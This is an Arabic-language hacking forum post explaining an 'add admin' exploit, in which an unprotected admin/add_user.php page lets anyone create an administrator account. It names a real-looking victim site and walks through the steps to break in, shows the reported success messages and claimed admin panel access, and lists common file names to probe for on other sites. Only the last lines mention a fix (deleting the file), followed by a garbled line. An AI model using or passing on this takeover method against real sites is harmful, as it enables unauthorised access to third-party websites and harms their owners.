شرح exploit

يعني الاستغلال

http://localhost/path/admin/add_user.php

http://localhost <<< الموقع المصاب
/path/ <<< الملف المصاب
admin <<< مجلد الآدمن او لوحتة الادارة ...
/add_user.php <<< من اسمووووا ضاهر شو بيعمل
اضافة يوزر جديد


------------------------------------------

################################################## ###

انا جبت الضحيه


http://easttexassolutions.com/events


نجي للتطبيق !

http://easttexassolutions.com/events

بعدها الى هنا

admin/add_user.php


يعني هيك

http://easttexassolutions.com/events/admin/add_user.php

الآن ادخل ايمايلك + الباس

^_^

username and password successfuly inserted!

Login successful!

بعدها

http://easttexassolutions.com/events/admin

get your msn + pass ...



الآن انت داخل لوحة تحكم الآدمن

:D

################################################## ###


*************************************************

تم استغلآل الثغرة بنجآح

ملاحضة مهمة :

بآقلكم ثغرآت الـ Add Admin عآدة لها ملفآت محدده ووآضحه

مثل

addadmin.php

add_admin.php

admin_add.php

user_add.php

add_user.php

...

وعآدة تكون ورآ لوحة التحكم ADMIN or cpanel ...



تغرة جميلة ؟

:love:


///////////////////////////////////////////////



طريقة الترقيع بسيطة وهي حذف ملف add_user.php or ...

=>|| avp + hsjyghg eyvNj hgJ Add Admin add user